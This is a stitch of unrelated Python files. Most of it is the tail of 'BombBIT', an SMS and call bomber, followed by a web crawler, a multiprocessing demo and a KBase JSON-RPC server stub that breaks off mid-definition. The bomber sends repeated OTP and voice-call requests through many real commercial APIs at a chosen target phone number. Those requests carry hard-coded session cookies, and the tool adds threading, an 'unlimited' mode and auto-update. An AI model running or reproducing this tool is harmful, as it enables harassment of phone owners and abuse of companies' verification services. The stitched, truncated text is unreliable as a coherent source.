' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read()
except Exception:
return True
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}'
os.popen('rm temp.xxx2 > /dev/null 2>&1')
os.system('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:' + str(len(con)) +
'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')
while not os.path.exists('temp.xxx2'):
time.sleep(0.1)
rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest()
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip()
return rd.find('code:') != -1
elif lim == 16:
os.popen('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber=' + cc + pn +
'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update BombBIT')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To williamwillson4321@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print(" SMS Bombing ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print(" This Bomber Was Updated By Yash Navadiya !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://github.com/YashkumarNavadiya/BombBIT/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://github.com/YashkumarNavadiya/BombBIT/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting BombBIT...\n\n')
try:
noti = urllib.request.urlopen(
"https://github.com/YashkumarNavadiya/BombBIT/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
try:
nm = int(input("Enter Number of Calls To Send(Maximum 10): "))
except Exception:
print("Don't Worry it will take by default values")
nm=1
if nm > 10:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 10
try:
dl = float(input("Enter Delay time (in seconds) [Recommended 20 sec ] : "))
except Exception:
print("Don't Worry it will take by default values")
dl=20
elif type == 0:
if cc == "91":
try:
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
except Exception:
print("Don't Worry it will take by default values")
nm=5
dl=2
else:
try:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
except Exception:
print("Don't Worry it will take by default values")
nm=10
dl=10
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print('\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....\n')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1 or len(pn) > 10 or len(pn) < 10:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...\n')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tBombBIT Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
main.py
|
# -*- coding: utf-8 -*-
import sys
from urllib.request import urlopen
from bs4 import BeautifulSoup
from queue import Queue, Empty
from threading import Thread
visited = set()
queue = Queue()
def get_parser(host, root, charset):
def parse():
try:
while True:
url = queue.get_nowait()
try:
content = urlopen(url).read().decode(charset)
except UnicodeDecodeError:
continue
for link in BeautifulSoup(content).findAll('a'):
try:
href = link['href']
except KeyError:
continue
if not href.startswith('http://'):
href = 'http://%s%s' % (host, href)
if not href.startswith('http://%s%s' % (host, root)):
continue
if href not in visited:
visited.add(href)
queue.put(href)
print (href)
except Empty:
pass
return parse
if __name__ == '__main__':
host, root, charset = sys.argv[1:]
parser = get_parser(host, root, charset)
queue.put('http://%s%s' % (host, root))
workers = []
for i in range(5):
worker = Thread(target=parser)
worker.start()
workers.append(worker)
for worker in workers:
worker.join()
|
a.py
|
#
# Copyright 2015 riteme
#
from multiprocessing import *
import os
def proc(name):
print 'Running child process \"' + name +'\", pid:', os.getpid()
if __name__ == "__main__":
print 'Parent process is', os.getpid()
new_proc = Process(target = proc, args = ('A',))
print 'Process will start'
new_proc.start()
new_proc.join()
print 'Process end'
|
data_api2Server.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'data_api2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from data_api2.data_api2Impl import data_api2
impl_data_api2 = data_api2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['data_api2.get_taxon_async'] = ['data_api2', 'get_taxon']
async_check_methods['data_api2.get_taxon_check'] = ['data_api2', 'get_taxon']
sync_methods['data_api2.get_taxon'] = True
async_run_methods['data_api2.get_assembly_async'] = ['data_api2', 'get_assembly']
async_check_methods['data_api2.get_assembly_check'] = ['data_api2', 'get_assembly']
sync_methods['data_api2.get_assembly'] = True
async_run_methods['data_api2.get_feature_types_async'] = ['data_api2', 'get_feature_types']
async_check_methods['data_api2.get_feature_types_check'] = ['data_api2', 'get_feature_types']
sync_methods['data_api2.get_feature_types'] = True
async_run_methods['data_api2.get_feature_type_descriptions_async'] = ['data_api2', 'get_feature_type_descriptions']
async_check_methods['data_api2.get_feature_type_descriptions_check'] = ['data_api2', 'get_feature_type_descriptions']
sync_methods['data_api2.get_feature_type_descriptions'] = True
async_run_methods['data_api2.get_feature_type_counts_async'] = ['data_api2', 'get_feature_type_counts']
async_check_methods['data_api2.get_feature_type_counts_check'] = ['data_api2', 'get_feature_type_counts']
sync_methods['data_api2.get_feature_type_counts'] = True
async_run_methods['data_api2.get_feature_ids_async'] = ['data_api2', 'get_feature_ids']
async_check_methods['data_api2.get_feature_ids_check'] = ['data_api2', 'get_feature_ids']
sync_methods['data_api2.get_feature_ids'] = True
async_run_methods['data_api2.get_features_async'] = ['data_api2', 'get_features']
async_check_methods['data_api2.get_features_check'] = ['data_api2', 'get_features']
sync_methods['data_api2.get_features'] = True
async_run_methods['data_api2.get_proteins_async'] = ['data_api2', 'get_proteins']
async_check_methods['data_api2.get_proteins_check'] = ['data_api2', 'get_proteins']
sync_methods['data_api2.get_proteins'] = True
async_run_methods['data_api2.get_feature_locations_async'] = ['data_api2', 'get_feature_locations']
async_check_methods['data_api2.get_feature_locations_check'] = ['data_api2', 'get_feature_locations']
sync_methods['data_api2.get_feature_locations'] = True
async_run_methods['data_api2.get_feature_publications_async'] = ['data_api2', 'get_feature_publications']
async_check_methods['data_api2.get_feature_publications_check'] = ['data_api2', 'get_feature_publications']
sync_methods['data_api2.get_feature_publications'] = True
async_run_methods['data_api2.get_feature_dna_async'] = ['data_api2', 'get_feature_dna']
async_check_methods['data_api2.get_feature_dna_check'] = ['data_api2', 'get_feature_dna']
sync_methods['data_api2.get_feature_dna'] = True
async_run_methods['data_api2.get_feature_functions_async'] = ['data_api2', 'get_feature_functions']
async_check_methods['data_api2.get_feature_functions_check'] = ['data_api2', 'get_feature_functions']
sync_methods['data_api2.get_feature_functions'] = True
async_run_methods['data_api2.get_feature_aliases_async'] = ['data_api2', 'get_feature_aliases']
async_check_methods['data_api2.get_feature_aliases_check'] = ['data_api2', 'get_feature_aliases']
sync_methods['data_api2.get_feature_aliases'] = True
async_run_methods['data_api2.get_cds_by_gene_async'] = ['data_api2', 'get_cds_by_gene']
async_check_methods['data_api2.get_cds_by_gene_check'] = ['data_api2', 'get_cds_by_gene']
sync_methods['data_api2.get_cds_by_gene'] = True
async_run_methods['data_api2.get_cds_by_mrna_async'] = ['data_api2', 'get_cds_by_mrna']
async_check_methods['data_api2.get_cds_by_mrna_check'] = ['data_api2', 'get_cds_by_mrna']
sync_methods['data_api2.get_cds_by_mrna'] = True
async_run_methods['data_api2.get_gene_by_cds_async'] = ['data_api2', 'get_gene_by_cds']
async_check_methods['data_api2.get_gene_by_cds_check'] = ['data_api2', 'get_gene_by_cds']
sync_methods['data_api2.get_gene_by_cds'] = True
async_run_methods['data_api2.get_gene_by_mrna_async'] = ['data_api2', 'get_gene_by_mrna']
async_check_methods['data_api2.get_gene_by_mrna_check'] = ['data_api2', 'get_gene_by_mrna']
sync_methods['data_api2.get_gene_by_mrna'] = True
async_run_methods['data_api2.get_mrna_by_cds_async'] = ['data_api2', 'get_mrna_by_cds']
async_check_methods['data_api2.get_mrna_by_cds_check'] = ['data_api2', 'get_mrna_by_cds']
sync_methods['data_api2.get_mrna_by_cds'] = True
async_run_methods['data_api2.get_mrna_by_gene_async'] = ['data_api2', 'get_mrna_by_gene']
async_check_methods['data_api2.get_mrna_by_gene_check'] = ['data_api2', 'get_mrna_by_gene']
sync_methods['data_api2.get_mrna_by_gene'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
